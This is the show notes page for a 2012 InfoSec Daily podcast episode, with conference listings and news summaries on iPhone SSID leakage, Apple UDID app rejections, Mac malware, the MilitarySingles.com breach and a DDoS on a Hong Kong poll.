Your daily source of Pwnage, Policy and Politics.

Episode 629 – Last Three SSID, UUID, OS X Malware, MilitarySingles, and Election DDoS

InfoSec Daily Podcast Episode 629 for March 26, 2012. Tonight's podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.

 

Announcements:

InfoSec Southwest

When: March 30-April 1, 2012

Where: Austin, Texas

http://www.Infosecsouthwest.com

 

Outerz0ne 8

When: April 20-21, 2012

Where: Wellesley Inn, Atlanta GA

http://www.outerz0ne.org

 

Linuxfest Northwest 2012

When: Saturday, April 28-29, 2012

Where: Bellingham Technical College – Bellingham, WA

http://www.linuxfestnorthwest.org/

 

AIDE 2012

When: May 21-25, 2012

Where: MU Forensic Science Center  - Huntington, West Virginia

http://www.appyide.org/

 

LayerOne 2012

When: May 26-27, 2012

Where: Clarion Hotel – Anaheim, CA

http://www.layerone.org

 

Security 504: Hacker Techniques, Exploits & Incident Handling – Matt Romanek

When: June 20 – 27, 2012

Where: Courtyard Seattle Federal Way, WA


http://www.sans.org/mentor/details.php?nid=28014

 

Social Engineering Training

When: July 21-24, 2012

Where: Black Hat Vegas

When: August 20-24, 2012

Where:  Bristol, UK

When:  November 12-16, 2012

Where:  Columbia, MD

http://www.social-engineer.com/social-engineer-training

 

Inside and Out of the Social-Engineer Toolkit (SET)

When: July 21 – 22, 2012

When: July 23 – 24, 2012

Where: Black Hat Vegas

http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

 

DerbyCon 2012 – The “Deuce” Reunion

When:  September 27-30, 2012

Where: Louisville, KY

http://www.derbycon.com

 

Skydogcon

When: October 26-28, 2012

Where: Hotel Preston in Nashville, TN

http://www.skydogcon.com

 

Thanks to everyone that has purchased products from Amazon through the affiliate program.  If you’re not familiar with the affiliate program, simply go to and locate the Affiliate Program link on the right hand side.

 

You don't have a sufficient version of Flash Player to display this animation.

 

Stories

Source:  http://www.novainfosecportal.com/2012/03/19/stalker-app-strikes-back-at-iphones-starbucks

Surprised there wasn’t more coverage on this story in the news on Friday… Basically, Mark Wuergler of Immunity Inc. found that the iPhone advertises the last three SSIDs it connected to, exposing the MAC addresses of those routers/access points as well. With this information anyone could then use a service like Google Location Services or Wireless Geographic Logging Engine to pinpoint exactly where a particular user has been. The same vulnerability is present on many of Apple’s other WiFi-enabled iOS devices as well. Here’s the relevant part of the ArsTechnica “Loose-lipped iPhones top the list of smartphones exploited by hacker” article I came across.

 

That’s because the iPhone is the only smartphone he knows of that transmits to anyone within range the unique identifiers of the past three wireless access points the user has logged into. He can then use off-the-shelf hardware to passively retrieve the routers’ MAC (media access control) addresses and look them up in databases such as Google Location Services and the Wireless Geographic Logging Engine. By allowing him to pinpoint the precise location of the wireless network, iPhones give him a quick leg-up when performing reconnaissance on prospective marks.

 

The article goes on to discuss an app Mark created called “Stalker” that automates collecting, parsing, and viewing not only of this iPhone data but tons of other sensitive information from any open WiFi hotspot. Previously, slurping this network traffic could have been done by anyone just sniffing an open wireless network but Stalker obviously “firesheeps” things to the next level.

 

Running on a laptop, Stalker vacuums up passwords, images, email and any other data that is sent unencrypted and organizes it in an easy-to-read interface.

Source: http://techcrunch.com/2012/03/24/apple-udids/

Amid extra scrutiny from Congress around privacy issues, Apple this week has started rejecting apps that access UDIDs, or identification numbers that are unique to every iPhone and iPad.

 

Apple had already given developers a heads-up about the change more than six months ago when it said in some iOS documentation that it was going to deprecate UDIDs. But it looks like Apple is moving ahead of schedule with pressure from lawmakers and the media. It can take more than a year to deprecate features because developers need time to adjust and change their apps. A few weeks ago, some of the bigger mobile-social developers told me that Apple had reached out and warned them to move away from UDIDs.

 

But this is the first time Apple has issued outright rejections for using UDIDs.

 

“Everyone’s scrambling to get something into place,” said Victor Rubba, chief executive of Fluik, a Canadian developer that makes games like Office Jerk and Plumber Crack. “We’re trying to be proactive and we’ve already moved to an alternative scheme.” Rubba said he isn’t sending any updates until he sees how the situation shakes out in the next few days.

 

For those unaware, the UDID is an alphanumeric string that is unique to each Apple device. It’s currently used by mobile ad networks, game networks, analytics providers, developers and app testing systems, like TestFlight, for example.

Playhaven, which helps developers monetize more than 1,200 games across iOS and Android, said several of its customers had been rejected in the last week. The company’s chief executive Andy Yang says that developers should try and stay as flexible as possible by supporting multiple ID systems until there’s a clear replacement.

Source: http://www.f-secure.com/weblog/archives/00002330.html

It's been a while since we last wrote about Mac malware, so I thought it would be good to give our readers an update on what's been happening during the last few months. Last year we detailed a possible Mac trojan in the making. At that time we were still speculating whether it would be part of a bundle or just a standalone binary. Now it's clear: a new variant was discovered and it is a full-blown application, complete with an icon.

The sample I analyzed uses thumbnail images/icons of Irina Shayk, apparently taken from the March 2012 issue of FHM (South Africa) magazine. The malicious application bundle is being spread inside an archive file together with other images taken from the magazine hoping that its file type will be overlooked by users.

Nothing else is new besides the implementation. The backdoor payload is still the same but uses a new C&C server. The server is currently active (at time of publication). It is important to take note that the new C&C server still points to the same IP address as the previous variant as mentioned by the folks at ESET. We have reported the server to CERT-FI. Hopefully they will be able notify the proper authorities.

We detect this new variant as Trojan-Dropper:OSX/Revir.C, MD5: 7DBA3A178662E7FF904D12F260F0FFF3.

Moving along — there's another more serious OS X malware threat lurking out there. The Flashback trojan, which first appeared around the same time as Revir, is still in the wild. It is using exploits to infect systems without user interaction. Though what it's exploiting are old Java vulnerabilities (CVE-2011-3544 and CVE-2008-5353), we might begin seeing a real OS X outbreak if the gang upgrades their operation a notch higher and start targeting unpatched vulnerabilities.

Source: http://www.databreaches.net/?p=23736

MilitarySingles.com has apparently been hacked.  The hack was announced on Twitter earlier today by Operation Digiturk and a database of 163,792 names, usernames, e-mail addresses, IP addresses, and passwords has been dumped on the Internet.  The tweet was accompanied by the hashtags #anonymous #antisec #infosec

I  don’t know if the site is aware of the hack and eSingles Inc.’s own web site does not seem to exist any more. I sent a courtesy notification to MilitarySingles.com to alert them to the hack with a request that they let this blog know what steps they will take to protect their users.

In any event, if  you know a member of the military who uses or has used the site, do them a favor and suggest they change their password on any site where they may have reused it – including their mil.gov email account.

Source: http://www.theregister.co.uk/2012/03/26/hong_kong_vote_hack/

Two men have been arrested after an online referendum organised by Hong Kong university to poll citizens on their choice of chief executive was disabled in an apparent denial of service attack.

Broadcaster Radio Television Hong Kong (RTHK) reported that the men, aged 17 and 28, were arrested at the weekend after the online poll was disrupted for a large part of Friday and some of Saturday.

Hong Kong university’s Public Opinion Program set up the 'Civic Referendum Project' because people who live in the Special Administrative Region (SAR) of China are not given the power to vote directly for their CEO – effectively the head of the Hong Kong government.

Instead a pre-selected 1,200-strong Election Committee full of pro-Beijing businessmen is given the task, a fact that is angering a growing number of democracy-hungry locals, especially given that this year’s candidates were universally unpopular and tainted with scandal.

AFP reported that Hong Kong uni’s back-end systems buckled under the huge volume of traffic.